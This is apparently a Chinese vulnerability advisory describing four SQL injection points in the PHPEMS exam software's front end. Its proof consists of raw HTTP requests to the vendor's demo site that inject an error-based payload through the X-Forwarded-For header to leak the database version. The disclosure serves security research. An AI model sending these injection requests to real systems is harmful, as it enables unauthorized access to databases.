|代码审计之PHPEMS前台四处注入&lt;官网demo演示&gt;

代码审计之PHPEMS前台四处注入&lt;官网demo演示&gt;

- AV AC AU C I A

发布： 2025-04-13

修订： 2025-04-13

### 简要描述：代码审计之PHPEMS前台四处注入<官网demo演示> ### 详细说明：官网：http://phpems.net 官方演示站：http://phpems.net/2014 分析过程如下图： [<img src="https://images.seebug.org/upload/201503/202051515b09bb5cded373e64fa69f01d4f07307.png" alt="phpems.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/202051515b09bb5cded373e64fa69f01d4f07307.png) ### 漏洞证明：证明：需要清空cookie，代码条件 1、http://phpems.net/2014//index.php?exam-api-login GET /2014//index.php?exam-api-login HTTP/1.1 Host: phpems.net User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Cookie: X-Forwarded-For: 8.8.8.8' and extractvalue(1, concat(0x7e, (select version()),0x7e)))# Connection: keep-alive [<img src="https://images.seebug.org/upload/201503/20205323e95d8b9d19af8bef5a58268788e9e900.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/20205323e95d8b9d19af8bef5a58268788e9e900.jpg) 2、http://phpems.net/2014//index.php?user-master-user GET /2014//index.php?user-master-user HTTP/1.1 Host: phpems.net User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Cookie: X-Forwarded-For: 8.8.8.8' and extractvalue(1, concat(0x7e, (select version()),0x7e)))# Connection: keep-alive [<img src="https://images.seebug.org/upload/201503/20205342e6a3132cfb8d32397895464d949b7e20.jpg" alt="2.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/20205342e6a3132cfb8d32397895464d949b7e20.jpg) 3、http://phpems.net/2014//index.php?user-phone-register GET /2014//index.php?user-phone-register HTTP/1.1 Host: phpems.net User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Cookie: X-Forwarded-For: 8.8.8.8' and extractvalue(1, concat(0x7e, (select version()),0x7e)))# Connection: keep-alive [<img src="https://images.seebug.org/upload/201503/20205401c0a7c5e377fe478926090ce27406c02f.jpg" alt="3.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/20205401c0a7c5e377fe478926090ce27406c02f.jpg) 4、http://phpems.net/2014//index.php?document-api-manage GET /2014//index.php?document-api-manage HTTP/1.1 Host: phpems.net User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Cookie: X-Forwarded-For: 8.8.8.8' and extractvalue(1, concat(0x7e, (select version()),0x7e)))# Connection: keep-alive [<img src="https://images.seebug.org/upload/201503/2020541453baedadb875e21f130bd2b5ec64b391.jpg" alt="4.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/2020541453baedadb875e21f130bd2b5ec64b391.jpg)

漏洞利用/PoC

暂无可用Exp或PoC

受影响的平台与产品

当前有0条受影响产品信息

您还没有登录，登录后可查看更多

添加资源
收藏资源
问题反馈

贡献用户

暂无贡献用户

VULHUB ™